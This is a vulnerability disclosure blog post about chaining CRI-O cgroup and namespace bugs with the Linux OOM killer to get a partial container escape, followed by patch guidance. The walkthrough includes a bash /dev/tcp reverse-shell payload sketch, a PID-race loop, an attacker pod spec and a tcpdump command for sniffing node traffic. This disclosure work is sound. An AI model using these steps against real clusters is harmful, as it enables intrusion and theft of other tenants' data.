
Gather around the fire for a story about the unlikely partnership of bugs that led to a partial container escape. While this is a fairly technical post covering some container and Kubernetes components, we’ve included links throughout in case you want to learn more about them or need a refresher while reading.

TL;DR

Three issues in CRI-O (the default Kubernetes container engine for Red Hat’s OpenShift and openSUSE’s Kubic), combined with an overzealous out-of-memory (OOM) killer in recent Linux kernels, can enable a partial container escape on hosts running CRI-O and Kubernetes. If the stars align, a contained process/workload (e.g. your nginx container) can snoop on network traffic and connect to arbitrary services (e.g. the kubelet) on the affected node, as well as interact with the node’s shared memory and IPC mechanisms. In older versions of Kubernetes, this meant whole-node takeover. In more recent versions, exploitation is more deployment-specific.

As an example, these vulnerabilities could be exploited to dump all HTTP traffic destined for containers on a node — probably relevant if you use SSL termination early on in your stack — as any customer or corporate data flowing through the compromised node would be fair game to an attacker. This could mean passwords, personally identifiable information (PII), or other goodies could be viewed by an attacker at their leisure.

There’s no need to panic, though. It’s good to note that there isn’t a generic complete container escape or node takeover path using these bugs (on the setups we’ve looked at, anyway). Furthermore, triggering these issues requires the ability to create a pod based on a container image you control, which takes additional effort for an attacker to arrange. So, it’s more like stars have to be aligned between galaxies. There are a number of GitHub issues related to these bugs, but nothing tying all of the elements at play together. After spending some time on the issues, we finally reproduced the scenario, and are pleased to share the results with you today!

CVE-2019-14891 has been assigned for one of the issues we identified. Resolution of this issue greatly reduces the likelihood of this scenario manifesting. We’d like to give a big thanks to the CRI-O and Red Hat security teams for their great response and mitigation of these issues!

Is there a patch?

Yes, as of CRI-O version 1.16.1! Even if you can’t update right away, the issue is easy to mitigate provided you are running CRI-O v1.15 or greater. Simply add (or change) the following directive in your /etc/crio/crio.conf file:

conmon_cgroup = "system.slice"

The above is the default setting for conmon_cgroup as of 1.16.1. Read below to find out why putting conmon in a non-pod cgroup is a good idea!
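
If you want to sanity-check the change, a rough approach (assuming the systemd cgroup manager and that the CRI-O service is named crio.service; adjust for your distro) is to restart CRI-O, schedule a fresh pod, and confirm its conmon now lives outside the pod’s cgroup:

sudo systemctl restart crio
# once a new pod has been scheduled, pick the newest conmon and see which cgroup it landed in
cat /proc/"$(pgrep -n conmon)"/cgroup | grep -E 'slice|scope'
# with conmon_cgroup set to system.slice, this should no longer point into the pod's kubepods.slice hierarchy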

So.. What’s a CRI-O?

CRI-O is a lightweight container engine, like Docker, but one that is built specifically for use with Kubernetes. In fact, it was started as a Kubernetes incubator project. It uses the Kubernetes CRI (Container Runtime Interface) for container management.

CRI-O is the default container engine for Kubic (openSUSE’s Kubernetes distribution) and OpenShift, so while it still has minority market share, it is rapidly gaining popularity.

Pods

We’re not going to explain Kubernetes and Pods here in any real depth. This is a great resource for getting up to speed with that. We’ll grossly simplify things here:

  • A pod is a collection of containers that share some resources
  • A pod will always have at least two containers in it when deployed:
    • An infrastructure container, which typically runs the pause process, a placeholder that just waits for the workload containers to finish
    • A workload container (e.g. nginx, clamav, etc) that actually does the work
  • Each pod member will have its own container monitor (conmon in the CRI-O universe, docker-containerd-shim in Docker-land)
  • These containers are created using whatever container runtime is configured; the vast majority of the time, this is runc (see the sketch just after this list)
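
A minimal way to eyeball this structure on a running CRI-O node (assuming crictl is installed and pointed at CRI-O’s socket):

sudo crictl pods                                  # one sandbox per pod
sudo crictl ps                                    # the workload containers
ps -eo pid,ppid,comm | grep -E 'conmon|pause'     # the matching host processes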

The above stuff will become more relevant soon when we start talking about the different issues in CRI-O. Which is now!

Issue #1: All Process Eggs in One CGroup Basket

The first issue relates to how CRI-O assigns cgroups to processes. One goal of CRI-O is to account for all of the memory usage of each individual pod. To do so, all of the processes related to a given pod are placed in the same memory cgroup. 

An aside: Memory cgroups and the Out-Of-Memory (OOM) killer

What is a memory cgroup? A core component of resource management on Linux — and especially in containers — is the use of control groups (cgroups) to account for and limit resources such as CPU and memory for a process or group of processes. Memory cgroups allow for finer-grained control over how much memory an application can use.

The OOM killer is a kernel helper for dealing with memory-hungry processes. When a system is experiencing very heavy memory usage, the kernel goes around and slays whatever is using the most memory — in the hopes of keeping the system doing whatever it’s meant to be doing. Sounds helpful! The OOM killer uses SIGKILL to get rid of the process (and reclaim memory) as soon as possible.

To be more helpful, the kernel’s OOM killer got a makeover in 4.19+ kernels, gaining cgroup awareness. Now, instead of just killing the single process using the most memory on the whole system (I’m looking at you, Chrome), it also acts per cgroup. For example, if you created a pod (which also creates a cgroup) for your huge Java application and assigned it 256MB of memory, 256MB is all that Java could ever use, even if the host has a terabyte of RAM. All processes in that pod’s cgroup are subject to that memory restriction, so if there were another container in the pod (for example, a caching service), it would have to share that same 256MB. If the pod uses its full 256MB allotment, the OOM killer kills the biggest memory hog in the pod, not the biggest memory user on the whole system.
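
Here’s a minimal sketch of that behaviour outside of Kubernetes, assuming a cgroup v1 host with the memory controller mounted at /sys/fs/cgroup/memory (paths differ under cgroup v2):

sudo mkdir /sys/fs/cgroup/memory/demo
echo $((256*1024*1024)) | sudo tee /sys/fs/cgroup/memory/demo/memory.limit_in_bytes
echo $$ | sudo tee /sys/fs/cgroup/memory/demo/cgroup.procs   # move this shell into the cgroup
head -c 300M /dev/zero | tail   # tail buffers everything in memory; the OOM killer steps in around the 256MB mark

Only processes inside the demo cgroup are candidates for that kill; the rest of the system carries on untouched.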

But the killer can be a bit excitable at times. If two processes in the same memory cgroup trigger the OOM killer at the same time (e.g. by trying to make an allocation on different CPU cores), the OOM killer becomes an OOM serial killer, issuing two kills in sequence. This behavior seems to be limited to 4.19 through 5.2.x kernels. Note that when a process is killed with great prejudice (SIGKILL), no signal handlers run. There is no graceful termination or shutdown; the process is just shot in broad daylight. More on this in a moment, but for now, back to CRI-O.

In the interest of keeping track of exactly how much memory a container requires to run, CRI-O lumps the workload process (below, our test program called repro) and the “infrastructure container” process (the pause process — more on this under issue #2) — along with their associated conmon monitor processes — into the same cgroup. You can see the cgroup members in this OOM killer snippet below:

Nov 20 00:56:34 ubu-disco kernel: [  136.324486] Tasks state (memory values in pages):
Nov 20 00:56:34 ubu-disco kernel: [  136.324486] [  pid  ]   uid  tgid total_vm      rss pgtables_bytes swapents oom_score_adj name
Nov 20 00:56:34 ubu-disco kernel: [  136.324576] [   3825]     0  3825    19521      471    57344        0          -999 conmon
Nov 20 00:56:34 ubu-disco kernel: [  136.324577] [   3849]     0  3849      255        1    28672        0          -998 pause
Nov 20 00:56:34 ubu-disco kernel: [  136.324589] [   4254]     0  4254    19521      442    53248        0          -999 conmon
Nov 20 00:56:34 ubu-disco kernel: [  136.324591] [   4304]     0  4304    66664     3632    90112        0           996 repro
Nov 20 00:56:34 ubu-disco kernel: [  136.324595] oom-kill:constraint=CONSTRAINT_MEMCG,nodemask=(null),cpuset=/,mems_allowed=0,oom_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podf8e932ad_5487_4514_a5be_b75ad1b7a6ce.slice,task_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podf8e932ad_5487_4514_a5be_b75ad1b7a6ce.slice/crio-ee55f03bd921c55955d8995a0adbb9f19352603a637ea27f6ca8397b715435eb.scope,task=repro,pid=4304,uid=0
Nov 20 00:56:34 ubu-disco kernel: [  136.324600] Memory cgroup out of memory: Kill process 4304 (repro) score 1657 or sacrifice child
Nov 20 00:56:34 ubu-disco kernel: [  136.324627] Killed process 4304 (repro) total-vm:266656kB, anon-rss:14504kB, file-rss:24kB, shmem-rss:0kB
Nov 20 00:56:34 ubu-disco kernel: [  136.328368] oom_reaper: reaped process 4304 (repro), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
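
You can confirm the shared cgroup on a live node, too. A quick (and rough) check on a cgroup v1 host is to compare the memory cgroup of a pause process with that of a conmon:

for p in $(pgrep -x pause) $(pgrep -x conmon); do
  printf '%s: ' "$p"; grep memory /proc/"$p"/cgroup
done
# on affected CRI-O versions, a pod's conmon reports the same kubepods.slice/... memory cgroup as its pod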

CRI-O gets +1 for visibility into resource usage, but -9001 for stability — because sometimes, if the OOM killer becomes an OOM serial killer and triggers multiple times, it can kill a container monitor (conmon) process as well as workload and pause processes. This typically manifests as follows:

  1. The workload process (repro, above) allocates a bunch of memory, triggering the OOM killer. 
  2. Very shortly afterwards, and before the OOM killer does its job, one of the conmon processes in the cgroup tries to make an allocation. As the cgroup is already out of memory thanks to the repro process, this triggers the OOM killer again.
  3. OOM killer #1 fires, and kills the workload process for using too much memory. Makes sense. In this case, it tried to allocate 256MB of memory when the cgroup only gave it 18MB.
  4. OOM killer #2 fires, but the offender (the repro process) is already dead. So it kills something else instead. Quite often, it kills the conmon process of the pause (infrastructure) container — which we’ll cover in the next section.

Having conmon in the same cgroup as the containerized processes exposes the underlying container management systems to being killed. CVE-2019-14891 was assigned to this problem, which was resolved by putting conmon in a different cgroup from its pods by default.

Issue #2: If a Process Dies in a Forest, and No One is Around..

Our second issue in this chain of unfortunate events relates to how CRI-O doesn’t get notified when a conmon process is killed. CRI-O takes no action because it thinks the conmon process is still alive and well. Unfortunately, it isn’t. While not necessarily a vulnerability in itself, this decentralized container management approach plays its part in the chain of bugs. It stems from a deliberate design decision by the CRI-O team: containers should not be tied to a daemon, and users should be able to restart the cri-o daemon without tearing down and rebuilding all of their containers.

The conmon container monitor process is important because it, well, monitors a container. If conmon is gone-mon, there is no way for it to tell the container engine (CRI-O) about the health of whatever it was monitoring. When a conmon process is killed, whatever process it was managing is re-parented to init (PID 1). So if a pause process’ conmon is killed, that pause process ends up re-parented to init, where it just kind of floats (more on why that’s bad below). CRI-O, meanwhile, still thinks the pod is fully intact.
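
You can watch that re-parenting happen by hand on a throwaway node (not one you care about; pgrep may also match more than one pod, so treat this as a sketch):

PAUSE=$(pgrep -o -x pause)
ps -o pid,ppid,comm -p "$PAUSE"            # PPID is the conmon that spawned it
sudo kill -9 $(ps -o ppid= -p "$PAUSE")    # stand in for the OOM killer and shoot that conmon
ps -o pid,ppid,comm -p "$PAUSE"            # PPID is now 1; pause floats on, unmonitored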

Let’s pause for a bit

It’s probably worth taking a second to talk about the pause process and why it’s important. No super-gory details, but enough for some context.

When Kubernetes spins up a pod, it first creates an infrastructure container / pause process. You can actually kind of think of the pod as being the pause process: it holds the namespaces for the pod, and is the parent of the containers that live inside it. And if the infrastructure container (pause process) dies, all of the workload containers in the pod are culled, too.

After the pause process is started, a specification for the containers in that pod is created. The specification includes references for where containers in that pod should get their namespaces from. Whenever a workload process is created (e.g. the nginx container or whatever you were expecting to run), runc will apply the namespaces stored in this specification to the new process using the setns() system call. This ensures that if your nginx process dies, its replacement will be in the same namespaces as its predecessor. By default, a pod will have its own network, IPC, and UTS namespaces.
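
You can approximate that setns() step from a shell with nsenter, which joins the namespaces behind those /proc paths (a sketch; the target PID and the command are yours to pick):

PAUSE=$(pgrep -o -x pause)
sudo nsenter --target "$PAUSE" --net --ipc --uts hostname   # runs hostname inside the pod's net, IPC, and UTS namespaces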

Now, let’s return to why the pause process floating in init limbo presents such an issue.

Issue #3: Grief Is A Process

The final part of the puzzle is how CRI-O manages namespaces for pods, which are stored in the form of proc paths for the pause process (e.g. /proc/$PAUSEPID/ns/ipc). As noted in the previous section, these paths are used as the target of setns() calls for all containers created in that pod.

If the pause process goes away — say, due to being killed by that same overzealous OOM serial killer in the kernel — CRI-O never learns that the pause process is gone. This is important, because the next time CRI-O tries to create the workload container, it’s going to tell runc to copy all of the namespaces over from those /proc/$PAUSEPID/ns/x paths. But, runc fails to start the container, as the PID in the namespace path no longer exists due to the pause process’ untimely murder:

Nov 20 01:35:48 ubu-disco crio[871]: time="2019-11-20 01:35:48.213858401Z" level=error msg="Container creation error: container_linux.go:338: creating new parent process caused \"container_linux.go:1897: running lstat on namespace path \\\"/proc/18235/ns/ipc\\\" caused \\\"lstat /proc/18235/ns/ipc: no such file or directory\\\"\"\n"
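
The paths runc is complaining about are just symlinks under /proc, and they only exist for as long as the process does:

readlink /proc/"$(pgrep -o -x pause)"/ns/ipc   # e.g. ipc:[4026532208] while the pause process is alive
# once that process dies, the same readlink fails with "No such file or directory", exactly as in the log above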

Ultimately, PIDs get recycled, and $PAUSEPID will be assigned to some other, new process. Assuming the new owner of $PAUSEPID is still alive when Kubernetes next tries to schedule that pod, runc will dutifully copy over whatever namespaces the new, shiny $PAUSEPID has. If $PAUSEPID now belongs to a node process (instead of a pod process), the new container gets the host’s IPC, NET, and UTS namespaces, which looks something like this:

Nov 20 01:37:04 ubu-disco systemd[1]: Started crio-conmon-d7633a9ceb7ead21e04422ce1779d2bad122907d15fd1122f0a1c4143d42830b.scope.
Nov 20 01:37:04 ubu-disco systemd[1]: Created slice libcontainer_18509_systemd_test_default.slice.
Nov 20 01:37:04 ubu-disco systemd[1]: Removed slice libcontainer_18509_systemd_test_default.slice.
Nov 20 01:37:04 ubu-disco systemd[1]: Started libcontainer container d7633a9ceb7ead21e04422ce1779d2bad122907d15fd1122f0a1c4143d42830b.
Nov 20 01:37:04 repro-pod10-6c8bdc448f-47mhk systemd-resolved[687]: System hostname changed to 'repro-pod10-6c8bdc448f-47mhk'.

Aside from giving the attacker the ability to change the hostname, this also lets them interact with the underlying node’s network interfaces and traffic, as well as its IPC/shared memory instances. Simply put, the attacker can snoop on any sensitive data flowing to or from any pod on the node. Our PoC video shows us using tcpdump to capture traffic on all of the node’s interfaces.
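
For example, once a workload is sitting in the host network namespace, something as blunt as the following will happily capture plaintext HTTP headed to or from any pod on the node (the port and filter are just an example):

tcpdump -i any -nn -A 'tcp port 80'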

This issue is being resolved by the CRI-O team by creating namespace file descriptors and bind-mounting them into pods, instead of hard-coding a path to a transient process in /proc. That way, when runc creates the workload container again, it won’t be relying on a path that may now belong to an unrelated, out-of-pod process. This should land in the next couple of weeks, but in practice the patch for issue #1 largely mitigates this issue if you run CRI-O.
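
The gist of that fix can be illustrated with a plain bind mount, since a namespace pinned to a file outlives the process that created it (a rough sketch of the idea, not CRI-O’s actual implementation):

PAUSE=$(pgrep -o -x pause)
sudo touch /run/demo-netns
sudo mount --bind /proc/"$PAUSE"/ns/net /run/demo-netns
# even after the pause process exits, the namespace survives and can still be joined:
sudo nsenter --net=/run/demo-netns ip addr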

All Together Now

The steps below outline how the above issues can be chained together to achieve a partial container escape, where we get some of the host’s namespaces (ipc, net, and uts) but not all of them. The process names and PIDs referenced below line up with those in the video, if you want to play along.

1 – A new pod is created with a memory limit, resulting in four processes and two containers:

  • pause (the infrastructure container / pod process) and its associated conmon. The PID of the pause process (18235) is used to construct namespace paths (e.g. /proc/18235/ns/ipc) that are assigned to the sandbox container specification which is used when creating new containers in the pod.
  • repro (the workload container / process) and its associated conmon. It gets its namespaces assigned from the pause process (PID 18235). The repro process first checks whether it’s in the node’s UTS namespace: if it is, it sends a reverse shell to the attacker; if it isn’t, it tries to allocate 256MB of memory (a rough sketch of this logic follows the pod spec below). Here’s the pod configuration we used:
apiVersion: apps/v1
kind: Deployment
metadata:
  name: repro-pod2
spec:
  selector:
    matchLabels:
      name: repro-pod2
  template:
    metadata:
      labels:
        name: repro-pod2
    spec:
      containers:
        - name: repro-pod2
          image: docker.io/c8vt/repro-killer:latest
          resources:
            limits:
              memory: 21Mi
          command: ["/repro"]
          args: ["10.244.0.1", "4444"]
      imagePullSecrets:
      - name: regcred
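
We won’t reproduce repro’s source here, but a rough shell approximation of the logic described above looks like the following. The namespace check (counting network interfaces) and the reverse-shell one-liner are illustrative assumptions on our part, not necessarily what the real binary does:

#!/bin/bash
# $1 = attacker IP, $2 = attacker port (matching the args in the pod spec above)
# a fresh pod network namespace usually has just lo plus one veth; the host namespace has many more interfaces
if [ "$(ip -o link | wc -l)" -gt 3 ]; then
  bash -i >& /dev/tcp/"$1"/"$2" 0>&1    # we appear to have the node's namespaces: phone home
else
  head -c 256M /dev/zero | tail         # otherwise, blow past the memory limit and get OOM-killed
fi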

2 – The workload process (repro) allocates too much memory, invoking the kernel’s OOM killer.

3 – While this is taking place, the conmon process that manages the workload process also tries to allocate something, but as its memory cgroup is still in an OOM state, this fails too and invokes the kernel’s OOM killer. The OOM killer’s actions are serialized, so this takes place after the OOM killer round initiated from step #2.

  • Sometimes, a third allocation occurs at the same time. When this happens, we might skip steps #7-10, as the OOM killer kills the pause process at the same time.

4 – The OOM killer from step #2 kills the misbehaving workload process (repro) successfully.

Nov 20 01:35:43 ubu-disco kernel: Tasks state (memory values in pages):
Nov 20 01:35:43 ubu-disco kernel: [  pid  ]   uid  tgid total_vm      rss pgtables_bytes swapents oom_score_adj name
Nov 20 01:35:43 ubu-disco kernel: [  18197]     0 18197    19521      476    57344        0          -999 conmon
Nov 20 01:35:43 ubu-disco kernel: [  18235]     0 18235      255        1    32768        0          -998 pause
Nov 20 01:35:43 ubu-disco kernel: [  18653]     0 18653    19521      460    53248        0          -999 conmon
Nov 20 01:35:43 ubu-disco kernel: [  18724]     0 18724    66664     3629    90112        0           996 repro
Nov 20 01:35:43 ubu-disco kernel: oom-kill:constraint=CONSTRAINT_MEMCG,nodemask=(null),cpuset=crio-2636c2063b8682d6d5c6a81d74d5eddd14dd676445990f1b19e92919d6568acb.scope,mems_allowed=0,oom_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podfc0c0365_8e33_4543_a78c_a8958532a596.slice,task_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podfc0c0365_8e33_4543_a78c_a8958532a596.slice/crio-2636c2063b8682d6d5c6a81d74d5eddd14dd676445990f1b19e92919d6568acb.scope,task=repro,pid=18724,uid=0
Nov 20 01:35:43 ubu-disco kernel: Memory cgroup out of memory: Kill process 18724 (repro) score 1656 or sacrifice child
Nov 20 01:35:43 ubu-disco kernel: Killed process 18724 (repro) total-vm:266656kB, anon-rss:14504kB, file-rss:12kB, shmem-rss:0kB
Nov 20 01:35:43 ubu-disco kernel: conmon invoked oom-killer: gfp_mask=0x6040c0(GFP_KERNEL|__GFP_COMP), order=0, oom_score_adj=-999

5 – The OOM killer from step #3 starts (you can actually see it in the last line of the output above), and decides someone else needs to die. Sometimes this is the other conmon process — the one watching over the pause / infrastructure process. CRI-O is not informed of this death, and thinks that everything is still fine (aside from the workload process being killed, which triggers the usual Kubernetes backoff process). 

  • In the case below, the pause process was actually killed first.
Nov 20 01:35:43 ubu-disco kernel: Tasks state (memory values in pages):
Nov 20 01:35:43 ubu-disco kernel: [  pid  ]   uid  tgid total_vm      rss pgtables_bytes swapents oom_score_adj name
Nov 20 01:35:43 ubu-disco kernel: [  18197]     0 18197    19521      476    57344        0          -999 conmon
Nov 20 01:35:43 ubu-disco kernel: [  18235]     0 18235      255        1    32768        0          -998 pause
Nov 20 01:35:43 ubu-disco kernel: [  18653]     0 18653    19521      460    53248        0          -999 conmon
Nov 20 01:35:43 ubu-disco kernel: oom-kill:constraint=CONSTRAINT_MEMCG,nodemask=(null),cpuset=/,mems_allowed=0,oom_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podfc0c0365_8e33_4543_a78c_a8958532a596.slice,task_memcg=/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podfc0c0365_8e33_4543_a78c_a8958532a596.slice/crio-conmon-d2f0d56a2b6de8b76ecbcde807b5297c416cc909457b75842beb7b661a001f94.scope,task=conmon,pid=18197,uid=0
Nov 20 01:35:43 ubu-disco kernel: Memory cgroup out of memory: Kill process 18197 (conmon) score 0 or sacrifice child
Nov 20 01:35:43 ubu-disco kernel: Killed process 18235 (pause) total-vm:1020kB, anon-rss:4kB, file-rss:0kB, shmem-rss:0kB

6 – With the infrastructure container’s conmon dead, its process (pause) is orphaned and reparented to the node’s init process.

7 – Backoff timeout is reached, and the kubelet asks CRI-O to make another workload process (repro) for the pod, which it does. As expected, runc is invoked and copies the namespaces from the pause paths (/proc/18235/ns/[ipc|net|uts]).

8 – The new workload process (a new repro) allocates too much memory again, invoking the OOM killer again. (same as step #2)

9 – The workload’s conmon process tries to allocate something while the cgroup is OOMed, also invoking the kernel’s OOM killer (same as step #3)

10 – The OOM killer from step #8 kills the workload process (same as step #4)

11 – The OOM killer from step #9 looks for something to kill, and settles on the pause process (PID 18235). CRI-O is not informed of its death. The sandbox container specification (from step 1.1) is not changed, and still holds a reference to the now-dead pause process’ namespace paths (/proc/18235/ns/[ipc|net|uts]).

Note: At this point, all processes related to the pod are dead. The only remaining references to the sandbox exist in CRI-O.

12 – Step #7 keeps on repeating, but failing, because whenever a new repro / workload process is started, runc tries to copy over its namespaces from the paths in the container spec (those of the dead pause process, 18235). This is where we see that “lstat” error in logs from Issue #3:

Nov 20 01:35:48 ubu-disco crio[871]: time="2019-11-20 01:35:48.213858401Z" level=error msg="Container creation error: container_linux.go:338: creating new parent process caused \"container_linux.go:1897: running lstat on namespace path \\\"/proc/18235/ns/ipc\\\" caused \\\"lstat /proc/18235/ns/ipc: no such file or directory\\\"\"\n"

13 – Eventually, PIDs wrap, and some other process gets PID 18235 (the PID of the old pause process). We can help this along with a loop that iterates through PIDs until it lands on the one we want, at which point it sleeps, ensuring the PID is still referenceable by runc the next time it goes to create the repro container:

while :; do sh -c 'if [ $$ -eq 18235 ]; then echo "Sleeping as PID $$"; exec sleep 700; fi'; done

14 – Step #7 repeats again, and this time the workload process / container launches successfully, because runc could copy namespaces from our sleep process. If that new PID lives in different namespaces (e.g. the host’s), the containerized process inherits them. The namespaces copied are net, uts, and ipc.

15 – As the workload is being created, runc runs sethostname() which would normally set the contained process’ hostname to the pod’s name. Due to the container now having the node’s uts namespace, the whole node is assigned the pod’s name.

Nov 20 01:37:04 ubu-disco systemd[1]: Started crio-conmon-d7633a9ceb7ead21e04422ce1779d2bad122907d15fd1122f0a1c4143d42830b.scope.
Nov 20 01:37:04 ubu-disco systemd[1]: Created slice libcontainer_18509_systemd_test_default.slice.
Nov 20 01:37:04 ubu-disco systemd[1]: Removed slice libcontainer_18509_systemd_test_default.slice.
Nov 20 01:37:04 ubu-disco systemd[1]: Started libcontainer container d7633a9ceb7ead21e04422ce1779d2bad122907d15fd1122f0a1c4143d42830b.
Nov 20 01:37:04 repro-pod10-6c8bdc448f-47mhk systemd-resolved[687]: System hostname changed to 'repro-pod10-6c8bdc448f-47mhk'.

Here’s the video of it all in play:

Exploitation scenario

The likelihood of these bugs actually being exploited is pretty minimal. Exploitation requires a few stars to be aligned:

  • The target is running CRI-O, which has relatively low adoption
  • The target is running a kernel between v4.19 and 5.2 (inclusive)
  • The attacker can either 1) deploy a pod of their choosing or 2) control an image that they know will be deployed, and know that it will be deployed with a memory limit in place
  • The PID race is won (could take some time)
  • And even then, the impact depends on the deployment and whether there is actually something of value to dump or interact with on the host’s network interfaces.

These things could definitely happen, but that’s a lot of stars.

Conclusion

This is a pretty quirky collection of issues that, when combined, could result in an unprivileged pod getting access to sensitive host resources — such as privileged services running on the loopback interface, shared memory/IPC resources, and the ability to watch any network traffic on the node. Patch and reconfigure CRI-O or upgrade your kernel to the 5.3.x series so you won’t need to thank your lucky stars.
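
A quick way to check whether a given node sits in the affected window (assuming CRI-O’s default config path):

crio --version                            # fixed in 1.16.1 and later
uname -r                                  # the serial-killer OOM behaviour was observed on 4.19–5.2 kernels
grep conmon_cgroup /etc/crio/crio.conf    # should be system.slice, or at least not the pod's cgroup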

The Capsule8 Labs team conducts offensive and defensive research to understand the threat landscape for modern infrastructure and to continuously improve Capsule8’s attack coverage.
